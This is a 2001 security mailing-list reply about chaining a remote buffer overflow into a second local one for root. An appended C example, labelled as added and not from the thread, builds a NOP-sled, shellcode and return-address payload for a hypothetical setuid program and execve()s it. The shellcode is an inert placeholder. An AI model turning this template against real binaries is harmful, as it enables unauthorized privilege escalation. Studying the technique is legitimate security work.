Vulnerability Development mailing list archives
Re: buffer overflows encapsulation
From: Robert van der Meulen <rvdm () CISTRON NL>
Date: Tue, 23 Jan 2001 19:23:40 +0100
Hi.

Quoting gregory duchemin (c3rb3r () HOTMAIL COM):
> encapsulating buffer overflow. I mean an eggshell to exploit, for instance, a low-privilege user like nobody through a usual vulnerable CGI, but this eggshell would be crafted to locally exploit another buffer overflow in the way, this time to get root.
Maybe I'm not understanding you here. Why would you want to do that? If you can exploit the first hole, you can do the second one from a shell.

I guess it would be possible to have your first overflow exec the second vulnerable program instead of /bin/sh, but you would have to add your 2nd-stage buffer overflow code into the execve code in the buffer you're using to exploit the first one. AFAIK this is useless: a lot of extra work to automate what you can do faster by hand. (Apart from that, an exploit like that wouldn't prove anything, just that you can do a two-stage exploit by exploiting one program first and having the exploit exploit a second one automatically.)

Greets,
  Robert
--
Linux Generation
Never trust a child farther than you can throw it.
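The layout Robert sketches above (a first stage that, instead of spawning /bin/sh, execve()s a second local program with a stack-smash payload in its argv) can be written out as a small stager. The following is an added example and not code from the thread or from either poster; the target path, buffer size, padding, return address and the int3 placeholder "shellcode" are all assumptions chosen for illustration, not a real vulnerable program.

```c
/* Added example (not from the original thread). Stage 1 builds a classic
 * [NOP sled][shellcode][return address x N] payload for a HYPOTHETICAL local
 * target and hands it over via execve() instead of spawning /bin/sh. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical second-stage target; name and numbers are assumptions. */
#define STAGE2_TARGET "/usr/local/bin/hypothetical-suid-tool"
#define STAGE2_BUFSZ  512            /* assumed size of its overflowable buffer   */
#define STAGE2_PAD    32             /* assumed bytes from buffer end to saved EIP */
#define STAGE2_RET    0xbffff5a0UL   /* assumed address inside the NOP sled       */
#define RET_COPIES    8              /* repeat the address to absorb small misses */

/* Placeholder "shellcode": int3 breakpoints, deliberately non-functional. */
static const unsigned char kShellcode[] = { 0xcc, 0xcc, 0xcc, 0xcc };

/* Lay out [NOP sled][shellcode][return address x RET_COPIES] in `out`.
 * Returns the payload length (0 if `cap` is too small). The payload is
 * NUL-terminated and contains no interior NUL, so strcpy()-style copies in
 * the target carry all of it. The return address is written in host byte
 * order, i.e. little-endian on x86, which is what a 32-bit x86 stack needs. */
size_t build_stage2_payload(unsigned char *out, size_t cap) {
  const size_t ret_bytes = RET_COPIES * sizeof(uint32_t);
  const size_t total = STAGE2_BUFSZ + STAGE2_PAD + ret_bytes;
  if (cap < total + 1) return 0;

  const size_t sled = total - ret_bytes - sizeof(kShellcode);
  memset(out, 0x90, sled);                               /* NOP sled    */
  memcpy(out + sled, kShellcode, sizeof(kShellcode));    /* shellcode   */
  uint32_t ret = (uint32_t)STAGE2_RET;
  for (size_t i = 0; i < RET_COPIES; i++)                /* saved EIP   */
    memcpy(out + sled + sizeof(kShellcode) + i * sizeof(ret), &ret, sizeof(ret));
  out[total] = '\0';
  return total;
}

/* A payload that is truncated by the first NUL byte is useless; verify it. */
int payload_is_nul_free(const unsigned char *p, size_t len) {
  return strlen((const char *)p) == len;
}

/* What the first-stage code would do in place of execve("/bin/sh"):
 * exec the second vulnerable program with the payload as argv[1].
 * Returns -1 (with errno set) only if execve() fails. */
int stage_one_exec(void) {
  unsigned char payload[STAGE2_BUFSZ + STAGE2_PAD + RET_COPIES * sizeof(uint32_t) + 1];
  size_t len = build_stage2_payload(payload, sizeof payload);
  if (len == 0) return -1;
  char *argv[] = { STAGE2_TARGET, (char *)payload, NULL };
  char *envp[] = { NULL };                               /* clean environment */
  execve(STAGE2_TARGET, argv, envp);                     /* returns only on failure */
  return -1;
}

int main(void) {
  if (stage_one_exec() == -1)
    fprintf(stderr, "stage 2 execve failed: %s\n", strerror(errno));
  return 1;
}
```

Note what this makes concrete about Robert's objection: the whole second-stage payload has to be embedded in the first stage's buffer, so the stage-1 shellcode must carry it as data and set up argv for execve, which is more work than typing the same thing at the shell the first exploit already gives you.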
Current thread:
- buffer overflows encapsulation gregory duchemin (Jan 22)
- Re: buffer overflows encapsulation Robert van der Meulen (Jan 23)